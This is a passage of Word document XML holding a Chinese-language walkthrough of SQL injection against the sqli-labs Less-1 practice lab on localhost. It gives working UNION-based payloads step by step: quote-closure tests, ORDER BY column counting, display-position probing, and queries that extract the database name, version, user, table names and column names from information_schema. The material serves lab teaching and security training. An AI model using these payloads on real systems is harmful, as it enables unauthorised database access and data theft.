        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>正常请求：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>http://localhost:8080/less/less-1.php?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，正常返回admin用户数据；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>恶意测试请求：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>http://localhost:8080/less/less-1.php?id=1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，触发SQL语法错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20421AE1">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>原理：用户输入的单引号与原有SQL语句中的单引号形成闭合，导致SQL语法缺失、语句异常，证明参数可被篡改，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>存在SQL注入漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605E5334">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="heading_21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step2：注入类型判定（数字型/字符型）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="5BE060AC">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心目的：区分参数闭合方式，确定后续注入Payload格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7711B255">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>判定方法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. 数字型注入：参数无引号包裹，可执行数学运算，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>id=2-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>返回id=1数据；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. 字符型注入：参数被单/双引号包裹，数学运算被当作字符串处理，无法执行运算。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B5D73">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次Less-1测试结果为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>字符型注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，需通过引号闭合完成注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AB3821">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="heading_22"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step3：闭合方式精准判定</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="0D7CEAFA">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>主流闭合方式包含单引号、双引号、单引号+括号、双引号+括号四类，通过注释符测试验证：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECB6E1B">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>测试Payload：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=1'--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，页面正常返回数据，无语法报错，判定Less-1为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>单引号闭合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052313AF">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注释符原理：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为MySQL标准行注释，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在URL中解析为空格，可注释掉后续多余SQL语句，避免语法报错。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB50677">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="heading_23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step4：ORDER BY爆破查询列数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="2C430D0E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心目的：UNION联合查询要求前后查询语句列数一致，需提前爆破目标查询的列数量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEE0CFD">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>测试流程：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=1' ORDER BY 1--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（正常）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=1' ORDER BY 2--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（正常）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=1' ORDER BY 3--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（正常）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=1' ORDER BY 4--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（报错）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C88CDE">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>判定结论：目标查询语句共</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，后续UNION查询必须匹配3列参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059032D7">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="heading_24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step5：回显显示位定位</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="7BBA324E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心目的：确定页面可展示查询数据的位置，用于后续回显敏感信息。通过负数参数使原查询无结果，仅展示UNION查询数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42183D7E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>测试Payload：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=-1' UNION SELECT 1,2,3--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，页面回显2、3为有效显示位，可用于输出数据库数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B356109">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="heading_25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step6：数据库元信息探测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="4C0A31AE">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过MySQL内置函数与系统库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，批量获取数据库基础信息与结构信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C7DB77">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. 获取当前数据库名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=-1' UNION SELECT 1,database(),3--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（结果：security）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. 获取数据库版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=-1' UNION SELECT 1,version(),3--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. 获取数据库用户名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=-1' UNION SELECT 1,user(),3--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. 获取全部数据表名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=-1' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. 获取指定表字段名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=-1' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' AND table_name='users'--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643A2E59">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心知识点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
